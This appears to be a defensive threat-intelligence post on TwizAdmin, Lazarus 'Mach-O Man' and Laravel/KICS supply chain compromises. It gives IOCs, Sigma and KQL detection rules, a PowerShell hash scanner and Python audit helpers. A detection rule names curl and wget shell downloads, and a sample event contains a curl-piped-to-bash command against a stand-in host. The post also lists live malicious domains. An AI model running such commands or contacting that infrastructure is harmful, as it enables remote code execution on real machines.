
TwizAdmin MaaS, Lazarus Mach-O Man & Supply Chain Poisoning: OTX Pulse Analysis

Security Arsenal Team
May 26, 2026

Threat Summary

Recent OTX pulses indicate a coordinated convergence of credential theft and supply chain compromise campaigns. Security teams must contend with the DataBreachPlus group deploying the TwizAdmin Malware-as-a-Service (MaaS) kit, which combines crypto-clipping, Java RATs, and ransomware modules. Simultaneously, the Lazarus Group is actively targeting the Finance and Technology sectors with the "Mach-O Man" malware kit via ClickFix attacks, while Cloud Atlas continues espionage operations against government entities in Belarus and Russia using PowerCloud backdoors. A critical vector involves supply chain poisoning, specifically in Laravel Lang packages and Checkmarx KICS Docker images, introducing backdoors for credential exfiltration.

Threat Actor / Malware Profile

DataBreachPlus (TwizAdmin / crpx0)

  • Distribution: Phishing campaigns impersonating FedEx; targets Windows and macOS.
  • Payload Behavior: Multi-stage malware featuring a clipboard hijacker for 8+ cryptocurrency chains, BIP-39 seed phrase theft, and browser credential exfiltration. Includes a ransomware module (crpx0).
  • C2 Communication: Managed via a FastAPI-based panel at 103.241.66[.]238:1337.

Lazarus Group (Mach-O Man / PyLangGhostRAT)

  • Distribution: Telegram messages containing fake meeting invitations (Zoom/Teams) redirecting to fraudulent collaboration platforms employing ClickFix social engineering.
  • Payload Behavior: macOS-specific malware kit. Triggers terminal commands to download and execute PyLangGhostRAT, a Python-based infostealer targeting browser credentials and session data.
  • Persistence: Uses LaunchAgents or cron jobs; exfiltration via Telegram.

Cloud Atlas (Inception Framework)

  • Distribution: Spear-phishing with malicious ZIP archives containing LNK shortcuts.
  • Payload Behavior: Deploying VBScript and PowerShell-based backdoors (VBCloud, PowerShower) for network reconnaissance and file theft (PowerCloud).
  • Targets: Government entities and commercial companies in Russia and Belarus.

TeamPCP (Supply Chain)

  • Distribution: Compromised Docker Hub images (checkmarx/kics) and VS Code extensions.
  • Payload Behavior: Trojanized binaries (mcpAddon.js, the Canister Worm) that steal infrastructure-as-code credentials and scan reports.

IOC Analysis

The provided pulses contain a mix of network and file-based indicators:

  • Domains: Key C2 and payload delivery domains include fanonlyatn.xyz (TwizAdmin), livemicrosft.com (Lazarus typo-squatting), and flipboxstudio.info (Laravel exfiltration).
  • File Hashes: Numerous SHA256 hashes associated with Mach-O binaries (Mach-O Man), Windows droppers (TwizAdmin), and poisoned Docker images (KICS).
  • Operationalization: SOC teams should immediately block listed domains at the perimeter. File hashes should be uploaded to EDR solutions for hunting; the presence of helpers.php in Laravel environments or mcpAddon.js in VS Code extensions indicates compromise.

Detection Engineering

```yaml
---
title: Suspicious macOS Script Execution via Terminal (Lazarus Mach-O Man)
id: b4b3a7a8-9b2c-4d1a-8f3e-6a5b4c3d2e1f
description: Detects execution of suspicious shell commands often used in ClickFix attacks to download payloads, such as curl piping to bash, spawned by common communication apps or browsers.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '/bin/sh'
            - '/bin/bash'
            - '/bin/zsh'
        CommandLine|contains:
            - 'curl '
            - 'wget '
    filter_legit_dev:
        # 'contains' rather than 'endswith': a parent image path continues past the .app bundle directory
        ParentImage|contains:
            - '/Xcode.app/'
            - '/Visual Studio Code.app/'
    condition: selection and not filter_legit_dev
falsepositives:
    - Legitimate developer scripts
level: high
---
title: Potential Laravel Backdoor Activity (helpers.php)
# note: this id contains non-hex characters and is not a valid UUID; regenerate it before importing the rule
id: c5c4b8b9-0c3d-4e2a-9f0g-7b6c5d4e3f2g
description: Detects execution or modification of the known malicious backdoor file helpers.php identified in compromised Laravel Lang packages.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://socket.dev/blog/laravel-lang-compromise
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: linux
    category: file_event
detection:
    selection:
        # both modifiers must match; a YAML map cannot repeat the key 'TargetFilename|contains'
        TargetFilename|endswith: '/helpers.php'
        TargetFilename|contains:
            - '/vendor/'
            - '/lang/'
    condition: selection
falsepositives:
    - Legitimate use of helper files (verify signature)
level: critical
---
title: Infostealer C2 Communication via Known Domains
# note: this id contains non-hex characters and is not a valid UUID; regenerate it before importing the rule
id: d6d5c9c0-1d4e-5f3b-0g1h-8c7d6e5f4g3h
description: Detects network connections to domains associated with TwizAdmin and Lazarus Mach-O Man campaigns based on recent OTX pulses.
status: experimental
date: 2026/05/26
author: Security Arsenal
references:
    - https://intel.breakglass.tech/post/twizadmin-103-241-66
    - https://any.run/cybersecurity-blog/lazarus-macos-malware-mach-o-man/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
detection:
    selection:
        DestinationHostname|contains:
            - 'fanonlyatn.xyz'
            - 'livemicrosft.com'
            - 'flipboxstudio.info'
    condition: selection
falsepositives:
    - Unknown
level: critical
```
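To check how the three rules above combine their selectors (the AND between the two `TargetFilename` modifiers, the `not filter_legit_dev` exclusion, and the `contains` match on hostnames), here is an added Python example that is not part of the Security Arsenal post. It reimplements the rule logic over constructed sample events; the three IOC domains and the `/vendor/`, `/lang/`, Xcode and VS Code paths come from the rules, while every other hostname, path and command line below is made up for the demo.

```python
"""Added example (not the post's code): the logic of the three Sigma rules above,
applied to constructed sample events so the matching semantics can be checked offline."""

# Values taken from the rules in the post.
C2_DOMAINS = ("fanonlyatn.xyz", "livemicrosft.com", "flipboxstudio.info")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
DOWNLOADERS = ("curl ", "wget ")
# Dev-tool parents the first rule excludes; compared with 'contains' because a parent
# image path continues past the .app bundle directory.
LEGIT_DEV_PARENTS = ("/Xcode.app/", "/Visual Studio Code.app/")


def is_clickfix_shell(image: str, command_line: str, parent_image: str) -> bool:
    """Rule 1: a shell with curl/wget on its command line, unless spawned by a dev tool."""
    selection = image.endswith(SHELLS) and any(d in command_line for d in DOWNLOADERS)
    filter_legit_dev = any(p in parent_image for p in LEGIT_DEV_PARENTS)
    return selection and not filter_legit_dev


def is_laravel_backdoor_file(target_filename: str) -> bool:
    """Rule 2: helpers.php written under a vendor/ or lang/ path (both selectors must hold)."""
    return target_filename.endswith("/helpers.php") and any(
        seg in target_filename for seg in ("/vendor/", "/lang/")
    )


def is_c2_connection(destination_hostname: str) -> bool:
    """Rule 3: destination hostname contains one of the campaign domains."""
    return any(d in destination_hostname.lower() for d in C2_DOMAINS)


def triage(events):
    """Return (rule_title, event) pairs for every event that matches one of the rules."""
    hits = []
    for ev in events:
        kind = ev["category"]
        if kind == "process_creation" and is_clickfix_shell(
            ev["Image"], ev["CommandLine"], ev["ParentImage"]
        ):
            hits.append(("Suspicious macOS Script Execution via Terminal", ev))
        elif kind == "file_event" and is_laravel_backdoor_file(ev["TargetFilename"]):
            hits.append(("Potential Laravel Backdoor Activity (helpers.php)", ev))
        elif kind == "network_connection" and is_c2_connection(ev["DestinationHostname"]):
            hits.append(("Infostealer C2 Communication via Known Domains", ev))
    return hits


# Constructed sample events. Only the IOC domains are from the post; the hostnames,
# paths and command lines are invented for the demo (example.invalid is a reserved TLD).
SAMPLE_EVENTS = [
    {"category": "process_creation", "Image": "/bin/zsh",
     "CommandLine": "zsh -c 'curl -s https://example.invalid/x | bash'",
     "ParentImage": "/Applications/Telegram.app/Contents/MacOS/Telegram"},
    {"category": "process_creation", "Image": "/bin/bash",
     "CommandLine": "bash -c 'curl -fsSL https://example.invalid/deps.sh | bash'",
     "ParentImage": "/Applications/Xcode.app/Contents/MacOS/Xcode"},  # excluded by the filter
    {"category": "process_creation", "Image": "/bin/zsh",
     "CommandLine": "zsh -c 'ls -la'",
     "ParentImage": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"category": "file_event",
     "TargetFilename": "/var/www/app/vendor/laravel-lang/lang/src/helpers.php"},
    {"category": "file_event",
     "TargetFilename": "/var/www/app/app/Support/helpers.php"},  # not under vendor/ or lang/
    {"category": "network_connection", "DestinationHostname": "cdn.fanonlyatn.xyz"},
    {"category": "network_connection", "DestinationHostname": "updates.microsoft.com"},
]

if __name__ == "__main__":
    for title, ev in triage(SAMPLE_EVENTS):
        print(f"[{title}] {ev}")
```

Running the block reports three hits: the Telegram-spawned shell, the vendor-path helpers.php, and the fanonlyatn.xyz connection. One caveat when deploying the second rule as written: Laravel's own framework ships `vendor/laravel/framework/src/Illuminate/Support/helpers.php`, so a `/vendor/` match on that filename will also fire on a routine `composer install`; scope the path to the laravel-lang package or pair the alert with a hash or signature check before paging anyone.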


```kql
// Hunt for network connections to TwizAdmin, Lazarus, or Laravel C2 domains
DeviceNetworkEvents
| where Timestamp > ago(1d)
| where RemoteUrl has_any ("fanonlyatn.xyz", "livemicrosft.com", "flipboxstudio.info")
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP

// Hunt for file events matching Mach-O Man or TwizAdmin hashes (a sample of the pulse hashes; extend the list from the OTX pulses)
DeviceFileEvents
| where Timestamp > ago(1d)
| where SHA256 in (
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessAccountName
```


```powershell
# IOC Hunt Script for TwizAdmin, Mach-O Man, and KICS Indicators
$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)

Write-Host "[+] Scanning for known malicious file hashes..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..." -ForegroundColor Yellow
    # -File skips directories; hashing every file is slow, so expect a long run on large volumes.
    # Get-FileHash returns upper-case hex and -contains is case-insensitive, so the lower-case list matches.
    Get-ChildItem -Path $Drive -File -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $FileHash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($FileHash -and ($TargetHashes -contains $FileHash)) {
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking for Laravel backdoor helpers.php..." -ForegroundColor Cyan
# helpers.php is also a legitimate Laravel filename; treat hits as leads to verify, not confirmed compromise.
$WebPaths = @("C:\inetpub", "D:\inetpub", "C:\xampp")
foreach ($Path in $WebPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Filter "helpers.php" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            Write-Host "[!] Suspicious helpers.php found at: $($_.FullName)" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking VS Code extensions for mcpAddon.js (KICS supply chain)..." -ForegroundColor Cyan
# VS Code installs extensions per user under %USERPROFILE%\.vscode\extensions
$ExtensionRoots = Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue |
    ForEach-Object { Join-Path $_.FullName ".vscode\extensions" } |
    Where-Object { Test-Path $_ }
foreach ($Root in $ExtensionRoots) {
    Get-ChildItem -Path $Root -Filter "mcpAddon.js" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        Write-Host "[!] Suspicious mcpAddon.js found at: $($_.FullName)" -ForegroundColor Red
    }
}
```

Response Priorities

  • Immediate:
    • Block all listed domains (fanonlyatn.xyz, livemicrosft.com, flipboxstudio.info, allgoodsdirect.com.au) at the proxy and firewall.
    • Scan all endpoints for the provided SHA256 file hashes.
    • Identify and quarantine any systems with checkmarx/kics Docker images or KICS VS Code extensions versions 1.17.0, 1.19.0, or Docker tags v2.1.20, v2.1.21.
  • 24 Hours:
    • Initiate credential reset for accounts accessed from endpoints flagged with infostealer indicators (browser credential dumping).
    • Audit Laravel projects for the compromised laravel-lang/lang versions; force update to clean versions.
    • Review logs for access to flipboxstudio.info (Laravel exfiltration).
  • 1 Week:
    • Implement strict allow-listing for IDE extensions and Docker image registries.
    • Conduct security awareness training focused on "ClickFix" social engineering and fake meeting invitations.
    • Enforce YubiKey or FIDO2 authentication for developer accounts to mitigate phishing-based supply chain takeovers.
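The quarantine and audit steps above (affected KICS Docker tags and VS Code extension versions, compromised laravel-lang/lang releases) are easy to script against inventory data. The following is an added Python example, not code from the post or from the projects named in it. The Docker tags v2.1.20/v2.1.21 and extension versions 1.17.0/1.19.0 come from the post; the post does not list the affected laravel-lang/lang versions, so `AFFECTED_LARAVEL_LANG` is a placeholder for the operator to fill in from the advisory. It assumes VS Code's `<publisher>.<name>-<version>` extension directory naming; the `checkmarx.kics` publisher id and all versions in the sample data are constructed for the demo.

```python
"""Added example (not the post's code): audit helper for the supply chain items in the
response priorities. Checks a composer.lock, a list of container image references and a
list of VS Code extension directory names against the indicators named in the post."""
import json

AFFECTED_KICS_DOCKER_TAGS = {"v2.1.20", "v2.1.21"}       # from the post
AFFECTED_KICS_EXTENSION_VERSIONS = {"1.17.0", "1.19.0"}  # from the post
AFFECTED_LARAVEL_LANG = {"0.0.0-PLACEHOLDER"}  # placeholder: the post does not list the versions


def compromised_laravel_lang(composer_lock_text: str, affected=AFFECTED_LARAVEL_LANG):
    """Return the locked laravel-lang/lang version if it is in the affected set, else None."""
    lock = json.loads(composer_lock_text)
    wanted = {v.lstrip("v") for v in affected}
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "laravel-lang/lang":
            version = str(pkg.get("version", "")).lstrip("v")
            return version if version in wanted else None
    return None


def compromised_kics_images(image_refs):
    """Return image references (e.g. 'checkmarx/kics:v2.1.20') whose tag is an affected one."""
    hits = []
    for ref in image_refs:
        repo, sep, tag = ref.rpartition(":")
        if not sep or "/" in tag:  # untagged, or the ':' belonged to a registry port
            repo, tag = ref, "latest"
        if repo.endswith("checkmarx/kics") and tag in AFFECTED_KICS_DOCKER_TAGS:
            hits.append(ref)
    return hits


def compromised_kics_extensions(extension_dirs):
    """Flag <publisher>.<name>-<version> extension directories for a KICS extension at an affected version."""
    hits = []
    for d in extension_dirs:
        name, sep, version = d.rpartition("-")
        if sep and "kics" in name.lower() and version in AFFECTED_KICS_EXTENSION_VERSIONS:
            hits.append(d)
    return hits


def audit(composer_lock_text, image_refs, extension_dirs, affected_lang=AFFECTED_LARAVEL_LANG):
    """Run all three checks and return one dict suitable for a ticket or SIEM enrichment."""
    return {
        "laravel_lang": compromised_laravel_lang(composer_lock_text, affected_lang),
        "kics_images": compromised_kics_images(image_refs),
        "kics_extensions": compromised_kics_extensions(extension_dirs),
    }


# Constructed sample inventory (package versions and the publisher id are invented).
SAMPLE_COMPOSER_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v11.0.0"},
        {"name": "laravel-lang/lang", "version": "v15.0.0"},
    ],
    "packages-dev": [],
})
SAMPLE_IMAGES = ["checkmarx/kics:v2.1.20", "checkmarx/kics:v2.1.19",
                 "docker.io/checkmarx/kics:v2.1.21", "nginx:latest",
                 "localhost:5000/checkmarx/kics"]
SAMPLE_EXTENSIONS = ["checkmarx.kics-1.17.0", "checkmarx.kics-1.18.0",
                     "ms-python.python-2024.0.1"]

if __name__ == "__main__":
    # Pass the real affected set from the advisory in place of the placeholder.
    print(json.dumps(audit(SAMPLE_COMPOSER_LOCK, SAMPLE_IMAGES, SAMPLE_EXTENSIONS), indent=2))
```

Feed it the output of `docker images --format '{{.Repository}}:{{.Tag}}'` and a listing of each user's `~/.vscode/extensions` directory, and keep the affected version sets in one place so they can be updated as the advisories evolve.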
